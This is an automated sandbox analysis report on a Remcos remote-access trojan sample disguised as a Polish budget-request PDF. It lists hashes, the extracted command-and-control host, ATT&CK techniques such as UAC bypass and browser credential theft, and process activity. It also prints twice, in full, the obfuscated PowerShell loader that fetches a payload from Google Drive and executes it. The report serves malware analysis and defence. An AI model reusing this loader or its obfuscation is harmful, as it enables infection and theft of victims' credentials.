remcos | a9b35270a11c6bbcf9aeffdc5094105486beed9e772b59116f276584d9357e12

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2024 12:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WNIOSEK BUDŻETOWY 25-11-2024·pdf.vbs
Size

16KB
MD5

7629b8a9f44c0d82a77edd71ff758028
SHA1

c7e7708565e250860139338d8a0dd79ba05a0b54
SHA256

a9b35270a11c6bbcf9aeffdc5094105486beed9e772b59116f276584d9357e12
SHA512

2ede58762d50013647f32a1b55c9979f0f99820c5e0fc2dbc94403d80f9a222fb07f319857e4fc2a25407b4c33d118250e4ff48475d83c49333c9c23a591d15c
SSDEEP

384:9Wl6/kDhGteC20UFY0Z0o6m1PdFu+mTD5Za:3/kMteC2VFeo64PruJK

Score

10^/10

remcos remotehost collection credential_access discovery evasion execution rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

hg575438h-0.duckdns.org:23458

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-WNVZ5S
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/2532-112-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/3376-122-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4696-111-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4696-111-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2532-112-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

flow	pid	Process
2	2132	WScript.exe
9	1388	powershell.exe
13	1388	powershell.exe
38	3708	msiexec.exe
41	3708	msiexec.exe
43	3708	msiexec.exe
45	3708	msiexec.exe
46	3708	msiexec.exe
48	3708	msiexec.exe
49	3708	msiexec.exe
50	3708	msiexec.exe
51	3708	msiexec.exe
53	3708	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
4412	Chrome.exe
2664	msedge.exe
3768	msedge.exe
60	msedge.exe
3564	msedge.exe
3308	Chrome.exe
4588	Chrome.exe
3404	Chrome.exe
4916	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1388	powershell.exe
4848	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
8	drive.google.com
9	drive.google.com
38	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3708	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4848	powershell.exe
3708	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3708 set thread context of 2532	3708	msiexec.exe	106
PID 3708 set thread context of 4696	3708	msiexec.exe	107
PID 3708 set thread context of 3376	3708	msiexec.exe	109

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4424	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1388	powershell.exe
1388	powershell.exe
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
2532	msiexec.exe
2532	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3376	msiexec.exe
3376	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3308	Chrome.exe
3308	Chrome.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe

Suspicious behavior: MapViewOfSection 7 IoCs

pid	Process
4848	powershell.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe
3708	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4916	msedge.exe
4916	msedge.exe
4916	msedge.exe
4916	msedge.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

description	pid	Process
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	3376	msiexec.exe
Token: SeShutdownPrivilege	3308	Chrome.exe
Token: SeCreatePagefilePrivilege	3308	Chrome.exe
Token: SeShutdownPrivilege	3308	Chrome.exe
Token: SeCreatePagefilePrivilege	3308	Chrome.exe
Token: SeShutdownPrivilege	3308	Chrome.exe
Token: SeCreatePagefilePrivilege	3308	Chrome.exe
Token: SeShutdownPrivilege	3308	Chrome.exe
Token: SeCreatePagefilePrivilege	3308	Chrome.exe
Token: SeShutdownPrivilege	3308	Chrome.exe
Token: SeCreatePagefilePrivilege	3308	Chrome.exe
Token: SeShutdownPrivilege	3308	Chrome.exe
Token: SeCreatePagefilePrivilege	3308	Chrome.exe
Token: SeShutdownPrivilege	3308	Chrome.exe
Token: SeCreatePagefilePrivilege	3308	Chrome.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
3308	Chrome.exe
4916	msedge.exe
4916	msedge.exe
4916	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3708	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2132 wrote to memory of 1388	2132	WScript.exe	82
PID 2132 wrote to memory of 1388	2132	WScript.exe	82
PID 4848 wrote to memory of 3708	4848	powershell.exe	93
PID 4848 wrote to memory of 3708	4848	powershell.exe	93
PID 4848 wrote to memory of 3708	4848	powershell.exe	93
PID 4848 wrote to memory of 3708	4848	powershell.exe	93
PID 3708 wrote to memory of 1900	3708	msiexec.exe	96
PID 3708 wrote to memory of 1900	3708	msiexec.exe	96
PID 3708 wrote to memory of 1900	3708	msiexec.exe	96
PID 1900 wrote to memory of 4424	1900	cmd.exe	98
PID 1900 wrote to memory of 4424	1900	cmd.exe	98
PID 1900 wrote to memory of 4424	1900	cmd.exe	98
PID 3708 wrote to memory of 3308	3708	msiexec.exe	99
PID 3708 wrote to memory of 3308	3708	msiexec.exe	99
PID 3308 wrote to memory of 3344	3308	Chrome.exe	100
PID 3308 wrote to memory of 3344	3308	Chrome.exe	100
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4336	3308	Chrome.exe	101
PID 3308 wrote to memory of 4284	3308	Chrome.exe	102
PID 3308 wrote to memory of 4284	3308	Chrome.exe	102
PID 3708 wrote to memory of 4800	3708	msiexec.exe	103
PID 3708 wrote to memory of 4800	3708	msiexec.exe	103
PID 3708 wrote to memory of 4800	3708	msiexec.exe	103
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104
PID 3308 wrote to memory of 3652	3308	Chrome.exe	104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WNIOSEK BUDŻETOWY 25-11-2024·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Pikkendes='Refall207';;$Atlaskeskjolens='Farveklip';;$Mglingens='Spildevandspaavirkningernes';;$Dagtemperaturen24='Flodblgerne';;$forskelsbehandlet='Erstatningsansvaret';;$Rettearbejders=$host.Name;function Preenforcing($Viderefr){If ($Rettearbejders) {$Carrousel=4} for ($databger=$Carrousel;;$databger+=5){if(!$Viderefr[$databger]) { break }$Derationalize+=$Viderefr[$databger]}$Derationalize}function dalmatiners($Dityrambes){ .($Protoglobulose) ($Dityrambes)}$Spleenens=Preenforcing '.rldnSaimE Gawt Upt.CauswU reeKradbFalsc CohlKullI In eAutonDataT';$Nonutilities=Preenforcing 'B acMDacaoA orzS mmiVrgelRidslChroa Spi/';$Tutorages=Preenforcing ' enTOrthl ForsPoro1Jako2';$Stedmorens36='Torv[KondN LaieTr pt R s. Co.S fteEPeriRKo,dVRattIScricUncoeCameP,oncORepoiSlutNAl uTSl fmprotaJenbnUnsaA RepGrobiE ostRChyl] ,ne:Salo:VareS UnrE BagcUninUSketRunamiRul TCollYUnsiPKerarSu.poNoniTUn ioKnolCM.moo U.sL.ema=Neig$ sydT SamUUntit Fu OH,reRwackAPapigPreaE Udvs';$Nonutilities+=Preenforcing 'Ud,e5Disk.Skid0.oll Upey(L.ftWR.keiFunkn D.udBenyoKe pwFabrsFor EvicNKonsT or Som 1Optr0 Mon.Op r0srba;D,de ,aniWUdsii ek.nPs,u6Ase.4 ec; Auk Taljx rud6Arcc4Trig; T.r Melir nrev nt:Fore1 De 3Skov1 non.Guld0Jung)Brne UdduGNatieFr acUovekU,saoUnfa/Fo.e2Smrg0Vide1Aero0Efte0Brud1 van0 Nyk1Dunb LemmFS fti conrVoteeEsquf .uno ForxF,le/ nc1Gunf3Indl1 .as.Insu0';$Dunghill=Preenforcing ' BobuGldeSAu,ie BeaRAfna-LucuABl mg iddeSa.vnCottT';$Slukket=Preenforcing 'Skudh.reltxylet laspB gesTi h:Quad/Ov,r/ K mdAt orS lviAnglvA.roear.u.ConggBevioDemyo lumgQua lMorse Tak.Cal,cCyanoAfbamTw n/Fladu GricI si? I de afsxFedtpUnexo S.erSamltuspo=s rtdNonroS.riwForsn KatlSprdoboomaAabndForl& Frei etadSlag=Ga t1 ,rt7Kic.M Clox ar,xAr uZGreyUMer.TOphilEvigJSproIS,ciV,rti5 Intcb zatMaveK Runh tiD Bl JDel 4 A tcIn rtCh bLBagv6p epKFlkhLBundwJackrPopl9UropkSla 6Snkn1 E tE';$Mononucleosises=Preenforcing 'S mi>';$Protoglobulose=Preenforcing 'ApaniBilrE.fteX';$Hmmedes='Finn';$Svagelighed='\mandolin.Udr';dalmatiners (Preenforcing 'Mono$TavsgG inl naoU stBInsiATangLStrt:BarylNowiEUn,nD Cope.okil Re iLangn igI PlaeRick2Vamp5Bug.0,has=wisp$VegnE RodnO,erVRoc :B aaa eglPR soP ertdagteaLimit andA eta+Repr$ HorSUdspVRosaaBottGDe.tEParalE spiS nugF rgHTro eStacD');dalmatiners (Preenforcing ' Sol$inteGTjenlKaldO S oBHelbAMa.gLinte: greC LanODisaNBreds.romtCiteRInteUV.rtCUndeTA imiKorroOpr,nDragaAftvlDyrkLCo oyDipo=Nav $Des,sRadiL UteURisik,entkG rdE FortTurs.LedeSDolepPannlMa oIGlamTThio(Eare$SpatmBes OPainN GeroAf enOp rURaaocMagilBe eE dogO krS ForITeglsAmale BriS Clo)');dalmatiners (Preenforcing $Stedmorens36);$Slukket=$Constructionally[0];$billetsalg=(Preenforcing 'Shor$ LigGbioglStorORedaBYa oA TelLF.yg:wellAKathrL.ngbMisfi.ovjtTumbRUdhaARe rGMaanECogrAOverFIlsadUnm eBengLUnd iCratNTaxiGLsehe MisnFlam= ThyNMilie.efrWA ma-Fj rOF.miBR diJPla,EOrnaC ,udT Ewe MortSTestyOffesforeT Di eReknM Syl.Mis $Knips ajePStamlRekoeSeceESub NTerreRy kNAdkvS');dalmatiners ($billetsalg);dalmatiners (Preenforcing 'Rntg$ElekARecorP rcbLydtiPenstSerarBarba Tykg dbeAnteaMidtfRemedLinoeTegnlHalui ubn IndgCollere,an D.v.bemeHAflyeHai aMisudStjmeEnrorpen sBrun[ T p$AlcyDUmaau JetnDagigValshR,byiCicelAd llNank]Rect=S.ar$ alvNDuloo Vo.nCynouBra t SveiSen lSno iOmfatAgteiAtike atis');$Lastvrk=Preenforcing ' U.s$ FriAVe,trCircbOctaiMor,t ntrUnmoaSporgSubde ngaaDislf La dSfyreWatclNonti,estnVe eg ForeMontn Reg.FighD BlaoFentwS,aanRuc lRe ooS joaStoldtrd FR naiEsmelWoefe Dah(Post$Gen SSammlM nsuRadikspilkFje,eFlertMont,Hypn$PostONonevSeaseGaa reftesTegnkS rguHomodR.cisTracp C.frM dtoPro dE,eruPr,tkEvertBoroi BrnoEscanlowle farr icenLigeeSpils,ord)';$Overskudsproduktionernes=$Ledelinie250;dalmatiners (Preenforcing ',ndd$ Hemg Or.L armOBortBSonja DisLGern: BriHkrukymuckdA,hmr IleUPaafr Attu ors ,or=Se.e(,tiktFiliekrlissol,TLege-AnidpDepaAKernTPreshAlde Nonc$FormOGardv f jE T nrConvSQuadkPh.luskeeDSkinsIntepBobbr akOPoseDS raU.etoKSymmtAn iIAft O Slun agdeMotorPolyNRenheT.rpS g i)');while (!$Hydrurus) {dalmatiners (Preenforcing ' Spi$ChaigChimlSdsuoSma.bB,eaaHa mlNonr:afveC ,rshZardaAvigrParattilgrHulki Bo ngradgOye,e Refnbed.= Pap$Ch ePDroso BartDrttiRecacOverhCyclo mimmFootaAabnnArboiAfgaa') ;dalmatiners $Lastvrk;dalmatiners (Preenforcing 'R crSTusit Un a ResRB ldTSepo-JydsSVan.L MeaeOndaEDiespDeic Sp n4');dalmatiners (Preenforcing ' Nyt$BioggDespl S eO GarbSigta rtilPali:Ven hKonfyR gndIna,rBeriU la.r Lu UVagaSAlfa=.uto(TunftRespeEthosUkloTAlgi-HimmPFejlABeauTRefehOut. Chik$Ukldo HvlvJor E S bRSubesPoolkUnd.u ,ledAll s UnspLapiR isdODundDNegeUK,rkK MartFrasI H cOinteNGh seKaraR IniNJernEDextsInge)') ;dalmatiners (Preenforcing ' Inf$Fo,sGPedilLejeoLaboB jenaNysgL Lan:IncuTS bfrL.ndEMyndEO erII.dhNg ndG oad=dors$J veg aadlAthrOLieuBAag aCalllmiss:Bardy esknBiflGRepeLUnp.ESpleDY tpyBespg CalT dueiRiemgDds eHjkiSDrab+Bl k+Si.e% Sol$Unsuc O,tOBllen E cSUngkt SteRRubbu CamcEremTSko.iLovfoLselnSedaA Scol A blTi,ey rov.Exarce,feoFrinu SkonGarrT') ;$Slukket=$Constructionally[$Treeing]}$Polaristrobometer=307322;$databgernterpretative=30954;dalmatiners (Preenforcing ' ele$Evi,GA,icL TomoTr mbPoleADrhalGire:Flagd edeRStraAD.gaGHoveePreueulovrBygnn auE run V l=Ubet AlkoGDallEBru tSt d-OutrC nseo H,nNN,nrTOmseECrofnShelT M.d St e$Predooph,VAs iENon RSkilSTovekIatrU A eDCiriS Al.p I oRSilvodegaDDemouautokDybsTImmuI LacO.igan LonEUdf.rBas.n TenetrniS');dalmatiners (Preenforcing 'pols$ExtegrecolAd loYde.b.steaBai,lPins: AmoE Gral Fl a Sorb Dego E erMi,naHumbtBicieSupesSyge S,e=Udb. Kali[BestSoneryPressFremtLar.eEgetmEmba.A,dwCRehaoMo rnAffav KleeT llrKrfttGr m]Stot: ,is:BlafFCla rR.daoTaksmTatoBT pka oofsfld eEarn6 .ud4Mis,S lytB,rtr ElriReapnUnstg.ngv(Orga$ T.dD Zy rPostasab.gTalleArche lygrW,ennwo,geNatb)');dalmatiners (Preenforcing ' Gra$Pa tGChadLUdenOPlumbBenaa Vi.l Pra: RepJSkanIBebum A tjBalaASupeMN tusLedn Kaff=Natt In r[ arrssqueYmid s FagTbl kEForlmAcre.S,amTBri eRachxcic TCal . S,mESpidNNonfCWan Or gnDSvmmiBrann St g.ors]Typo:Cali: s iaFjersTr ic,jleISub,ICons.NetsGLageeMa cT Tr SFilmTMichrBopyIBo unFri.gAuto(Hj,m$InvoEEn.elBu taIoniBDveloPantrCoota PretAflaeTodksHist)');dalmatiners (Preenforcing '.tal$B ocGRimsLInfaORealBDainAUdstlgamm:SpinpBidseThorlPanmeLugtc EenASpydnUnfaUL ndSResn= .re$PrerjGib i FejmUltijEpima sadMOverSLanc.CavasSu fuSillbbardsOleaT orsROpb iD asnA.begA om(Sejs$ Ep,PHoveO raglRib ADdker,ednI Pl.SDoodTNonbrPuseOCatcbspe OUnc MDisse.olstOutqE jerR alg,Kont$ ,usDP,tta G eTUndeaElg BetvrgInduERediR miln UndtSa sE orkROph P unkRRevieP.ssTPr mABri.TViroiM llVDagse ut)');dalmatiners $Pelecanus;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Pikkendes='Refall207';;$Atlaskeskjolens='Farveklip';;$Mglingens='Spildevandspaavirkningernes';;$Dagtemperaturen24='Flodblgerne';;$forskelsbehandlet='Erstatningsansvaret';;$Rettearbejders=$host.Name;function Preenforcing($Viderefr){If ($Rettearbejders) {$Carrousel=4} for ($databger=$Carrousel;;$databger+=5){if(!$Viderefr[$databger]) { break }$Derationalize+=$Viderefr[$databger]}$Derationalize}function dalmatiners($Dityrambes){ .($Protoglobulose) ($Dityrambes)}$Spleenens=Preenforcing '.rldnSaimE Gawt Upt.CauswU reeKradbFalsc CohlKullI In eAutonDataT';$Nonutilities=Preenforcing 'B acMDacaoA orzS mmiVrgelRidslChroa Spi/';$Tutorages=Preenforcing ' enTOrthl ForsPoro1Jako2';$Stedmorens36='Torv[KondN LaieTr pt R s. Co.S fteEPeriRKo,dVRattIScricUncoeCameP,oncORepoiSlutNAl uTSl fmprotaJenbnUnsaA RepGrobiE ostRChyl] ,ne:Salo:VareS UnrE BagcUninUSketRunamiRul TCollYUnsiPKerarSu.poNoniTUn ioKnolCM.moo U.sL.ema=Neig$ sydT SamUUntit Fu OH,reRwackAPapigPreaE Udvs';$Nonutilities+=Preenforcing 'Ud,e5Disk.Skid0.oll Upey(L.ftWR.keiFunkn D.udBenyoKe pwFabrsFor EvicNKonsT or Som 1Optr0 Mon.Op r0srba;D,de ,aniWUdsii ek.nPs,u6Ase.4 ec; Auk Taljx rud6Arcc4Trig; T.r Melir nrev nt:Fore1 De 3Skov1 non.Guld0Jung)Brne UdduGNatieFr acUovekU,saoUnfa/Fo.e2Smrg0Vide1Aero0Efte0Brud1 van0 Nyk1Dunb LemmFS fti conrVoteeEsquf .uno ForxF,le/ nc1Gunf3Indl1 .as.Insu0';$Dunghill=Preenforcing ' BobuGldeSAu,ie BeaRAfna-LucuABl mg iddeSa.vnCottT';$Slukket=Preenforcing 'Skudh.reltxylet laspB gesTi h:Quad/Ov,r/ K mdAt orS lviAnglvA.roear.u.ConggBevioDemyo lumgQua lMorse Tak.Cal,cCyanoAfbamTw n/Fladu GricI si? I de afsxFedtpUnexo S.erSamltuspo=s rtdNonroS.riwForsn KatlSprdoboomaAabndForl& Frei etadSlag=Ga t1 ,rt7Kic.M Clox ar,xAr uZGreyUMer.TOphilEvigJSproIS,ciV,rti5 Intcb zatMaveK Runh tiD Bl JDel 4 A tcIn rtCh bLBagv6p epKFlkhLBundwJackrPopl9UropkSla 6Snkn1 E tE';$Mononucleosises=Preenforcing 'S mi>';$Protoglobulose=Preenforcing 'ApaniBilrE.fteX';$Hmmedes='Finn';$Svagelighed='\mandolin.Udr';dalmatiners (Preenforcing 'Mono$TavsgG inl naoU stBInsiATangLStrt:BarylNowiEUn,nD Cope.okil Re iLangn igI PlaeRick2Vamp5Bug.0,has=wisp$VegnE RodnO,erVRoc :B aaa eglPR soP ertdagteaLimit andA eta+Repr$ HorSUdspVRosaaBottGDe.tEParalE spiS nugF rgHTro eStacD');dalmatiners (Preenforcing ' Sol$inteGTjenlKaldO S oBHelbAMa.gLinte: greC LanODisaNBreds.romtCiteRInteUV.rtCUndeTA imiKorroOpr,nDragaAftvlDyrkLCo oyDipo=Nav $Des,sRadiL UteURisik,entkG rdE FortTurs.LedeSDolepPannlMa oIGlamTThio(Eare$SpatmBes OPainN GeroAf enOp rURaaocMagilBe eE dogO krS ForITeglsAmale BriS Clo)');dalmatiners (Preenforcing $Stedmorens36);$Slukket=$Constructionally[0];$billetsalg=(Preenforcing 'Shor$ LigGbioglStorORedaBYa oA TelLF.yg:wellAKathrL.ngbMisfi.ovjtTumbRUdhaARe rGMaanECogrAOverFIlsadUnm eBengLUnd iCratNTaxiGLsehe MisnFlam= ThyNMilie.efrWA ma-Fj rOF.miBR diJPla,EOrnaC ,udT Ewe MortSTestyOffesforeT Di eReknM Syl.Mis $Knips ajePStamlRekoeSeceESub NTerreRy kNAdkvS');dalmatiners ($billetsalg);dalmatiners (Preenforcing 'Rntg$ElekARecorP rcbLydtiPenstSerarBarba Tykg dbeAnteaMidtfRemedLinoeTegnlHalui ubn IndgCollere,an D.v.bemeHAflyeHai aMisudStjmeEnrorpen sBrun[ T p$AlcyDUmaau JetnDagigValshR,byiCicelAd llNank]Rect=S.ar$ alvNDuloo Vo.nCynouBra t SveiSen lSno iOmfatAgteiAtike atis');$Lastvrk=Preenforcing ' U.s$ FriAVe,trCircbOctaiMor,t ntrUnmoaSporgSubde ngaaDislf La dSfyreWatclNonti,estnVe eg ForeMontn Reg.FighD BlaoFentwS,aanRuc lRe ooS joaStoldtrd FR naiEsmelWoefe Dah(Post$Gen SSammlM nsuRadikspilkFje,eFlertMont,Hypn$PostONonevSeaseGaa reftesTegnkS rguHomodR.cisTracp C.frM dtoPro dE,eruPr,tkEvertBoroi BrnoEscanlowle farr icenLigeeSpils,ord)';$Overskudsproduktionernes=$Ledelinie250;dalmatiners (Preenforcing ',ndd$ Hemg Or.L armOBortBSonja DisLGern: BriHkrukymuckdA,hmr IleUPaafr Attu ors ,or=Se.e(,tiktFiliekrlissol,TLege-AnidpDepaAKernTPreshAlde Nonc$FormOGardv f jE T nrConvSQuadkPh.luskeeDSkinsIntepBobbr akOPoseDS raU.etoKSymmtAn iIAft O Slun agdeMotorPolyNRenheT.rpS g i)');while (!$Hydrurus) {dalmatiners (Preenforcing ' Spi$ChaigChimlSdsuoSma.bB,eaaHa mlNonr:afveC ,rshZardaAvigrParattilgrHulki Bo ngradgOye,e Refnbed.= Pap$Ch ePDroso BartDrttiRecacOverhCyclo mimmFootaAabnnArboiAfgaa') ;dalmatiners $Lastvrk;dalmatiners (Preenforcing 'R crSTusit Un a ResRB ldTSepo-JydsSVan.L MeaeOndaEDiespDeic Sp n4');dalmatiners (Preenforcing ' Nyt$BioggDespl S eO GarbSigta rtilPali:Ven hKonfyR gndIna,rBeriU la.r Lu UVagaSAlfa=.uto(TunftRespeEthosUkloTAlgi-HimmPFejlABeauTRefehOut. Chik$Ukldo HvlvJor E S bRSubesPoolkUnd.u ,ledAll s UnspLapiR isdODundDNegeUK,rkK MartFrasI H cOinteNGh seKaraR IniNJernEDextsInge)') ;dalmatiners (Preenforcing ' Inf$Fo,sGPedilLejeoLaboB jenaNysgL Lan:IncuTS bfrL.ndEMyndEO erII.dhNg ndG oad=dors$J veg aadlAthrOLieuBAag aCalllmiss:Bardy 